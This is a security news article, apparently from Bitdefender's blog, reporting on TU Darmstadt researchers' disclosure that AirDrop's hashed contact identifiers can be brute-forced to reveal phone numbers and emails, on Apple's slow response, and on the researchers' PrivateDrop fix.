2 min read

Apple AirDrop Flaws Could Let Hackers Grab Users' Phone Numbers and Email Addresses

Graham CLULEY

April 23, 2021

Ad One product to protect all your devices, without slowing them down.
Free 90-day trial
Apple AirDrop Flaws Could Let Hackers Grab Users' Phone Numbers and Email Addresses

Users of Apple products have long loved the ability to wirelessly share files with each other, using AirDrop to transmit files between their iPhones and Macbooks.

But researchers at the Technical University of Darmstadt in Germany have discovered that security weaknesses could allow an attacker to obtain a victim’s phone number and even email address.

And you know what’s worse? Apple hasn’t fixed the problem almost two years after being told about it, despite 1.5 billion devices worldwide being potentially vulnerable.

The researchers’ paper, entitled “PrivateDrop: Practical Privacy-Preserving Authentication for Apple AirDrop”, details what it describes as “two severe privacy vulnerabilities in the underlying authentication protocol” used by AirDrop.

According to the paper, the problem lies in how AirDrop determines if a nearby device belongs to somebody the user already knows.

To discover if two devices belong to mutual contacts, AirDrop transmits a SHA-256 hash of the sending user’s email address or phone number. Other devices in the vicinity examine the hash, and compare it to entries in their own address book – if a mutual match is made, the receiver sends back their own hash.

An attacker can brute-force the hash to determine users’ phone numbers – a technique which takes just seconds because of the relatively small number of possible phone numbers.

Email addresses are more complicated to easily reverse, but the researchers believe attackers could have some success if they used dictionary attacks that use common email formats (such aas firstname.lastname@gmail.com, yahoo.com, and so forth). In addition, hashed email addresses could be derived using data from past data breaches.

Responsibly, the researchers disclosed the flaw to Apple privately in May 2019, hoping that it would be fixed. Apple responded in July 2020, saying that it did “not have any updates on new features or any changes to mitigate the underlying issue.”

It’s worth remembering that for an attack to be successful, a malicious party would need to be in close physical proximity to their victims. And yes, there are probably easier ways to determine someone’s phone number rather than through this route – but that’s no reason not to harden the security of AirDrop.

Perhaps frustrated by Apple’s response, the research team developed its own proof-of-concept solution for AirDrop’s flawed design, which they called “PrivateDrop.” However, the researchers admit that the only practical way for it to be used in place of AirDrop is if Apple themselves integrated it into their devices’ operating systems.

tags


Author



Right now

Top posts

What is medical identity theft and how to protect against it

What is medical identity theft and how to protect against it

July 27, 2022

2 min read
Curious about Omegle? Here’s how the roulette-style chat platform can threaten your online privacy and security

Curious about Omegle? Here’s how the roulette-style chat platform can threaten your online privacy and security

July 07, 2022

5 min read
Identifying and Dealing with Online Bullying Is Not Impossible - School Presentation Inside

Identifying and Dealing with Online Bullying Is Not Impossible - School Presentation Inside

June 28, 2022

2 min read
Let’s Celebrate World Social Media Day by Improving Your Privacy and Security Online

Let’s Celebrate World Social Media Day by Improving Your Privacy and Security Online

June 28, 2022

3 min read
Bitdefender Reveals the Top Cyber Threats Faced by Consumers in 2021

Bitdefender Reveals the Top Cyber Threats Faced by Consumers in 2021

June 22, 2022

1 min read
Scam alert: Cybercrooks use shady investment domain to scam keen investors out of money and data

Scam alert: Cybercrooks use shady investment domain to scam keen investors out of money and data

May 24, 2022

3 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

Chinese criminals scam kids desperate to play games for more than three hours a week Chinese criminals scam kids desperate to play games for more than three hours a week
Graham CLULEY

August 12, 2022

2 min read
Sophisticated Smishing Attack on Twilio Leads to Employee Credential Leak and Data Breach Sophisticated Smishing Attack on Twilio Leads to Employee Credential Leak and Data Breach
Silviu STAHIE

August 09, 2022

1 min read
Attackers Hit German Chambers of Industry and Commerce; All Digital Services Down Attackers Hit German Chambers of Industry and Commerce; All Digital Services Down
Silviu STAHIE

August 05, 2022

1 min read